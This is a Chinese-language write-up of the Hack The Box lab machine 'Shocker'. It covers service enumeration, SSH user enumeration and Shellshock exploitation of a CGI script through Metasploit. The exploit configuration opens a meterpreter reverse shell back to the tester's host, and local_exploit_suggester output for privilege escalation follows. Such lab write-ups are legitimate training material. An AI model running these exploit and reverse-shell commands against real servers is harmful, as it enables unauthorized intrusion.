Shocker(shellshock破壳漏洞)

10.10.10.56

1
2
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

1

访问web,是一个单纯的图片,查看源码无发现。

2

目录扫描ing.
两个目录403,未发现其他目录

3

低版本目录枚举:

1
2
3
4
5
6
7
8
ssh -p 2222 root@10.10.10.56

python ssh.py --port 2222 --username root 10.10.10.56
/usr/lib/python2.7/dist-packages/paramiko/rsakey.py:119: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),
/usr/lib/python2.7/dist-packages/paramiko/rsakey.py:99: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),
root is a valid user!

经过以上探测,没有发现任何攻击路径,然后找一下中间件版本漏洞。

4

Apache HTTPD信息泄露漏洞(CVE-2016-4979)
没发现可以exp

5

1
2
3
4
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                      | exploits/linux/webapps/42745.py

python3 42745.py -u http://10.10.10.56 -a
[ok] http://10.10.10.56: 'GET,HEAD,POST,OPTIONS'

6

nikto -h 10.10.10.56

nessus scan扫描都没有发现漏洞,尤其是目标主机名称为“Shocker”,我特地使用了Bash Shellshock Detection策略。

1
This policy is used to perform remote checks for the Shellshock vulnerability (CVE-2014-6271) via HTTP, FTP, SMTP, telnet, and SIP. SSH credentials can optionally be provided to test for CVE-2014-6271 via SSH and enumerate missing software updates for CVE-2014-6271 and CVE-2014-7291.

writeup

目录枚举发现/user.sh,下载后内容如下:

1
2
3
4
5
Content-Type: text/plain

Just an uptime test script

 01:13:47 up 6 days,  3:07,  0 users,  load average: 0.00, 0.00, 0.00

确认apache服务使用了cgi(通用网关接口),可以调用Linux的 bash shell。

job.rc

1
2
3
4
5
6
7
8
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST 10.10.10.56
set TARGETURI /cgi-bin/user.sh
set SRVHOST 10.10.14.17
set SRVPORT 7788
set payload linux/x64/meterpreter/reverse_tcp
set target 1
run
1
2
3
4
5
6
7
8
getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
sysinfo
Computer     : 10.10.10.56
OS           : Ubuntu 16.04 (Linux 4.4.0-96-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

观察到meterpreter构架为86,于是更改一下payload和target。

提权

1
2
3
4
5
6
7
8
9
background
search suggester
use post/multi/recon/local_exploit_suggester
set SESSION 3
run

[+] 10.10.10.56 - exploit/linux/local/bpf_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.56 - exploit/linux/local/bpf_sign_extension_priv_esc: The target appears to be vulnerable.
[+] 10.10.10.56 - exploit/linux/local/glibc_realpath_priv_esc: The target appears to be vulnerable.

总结

shellshock漏洞介绍:

1
2
3
4
5
6
7
1)Linux WEB Server一般可以提供CGI接口,允许远程执行Bash命令;

2)对于HTTP头部,CGI脚本解析器会将其当作环境变量,调用bash的env相关函数设置到临时环境变量中;

3)HTTP协议允许发送任意客户端自定义的HTTP头部;

4)这样就产生了一个完整的可供Bash命令注入的场景,客户端故意发送构造好的带攻击命令的HTTP头部到服务端,服务端调用设置环境变量的函数,直接执行了客户端指定的头部里面的命令。并且还会将结果一并返回给客户端。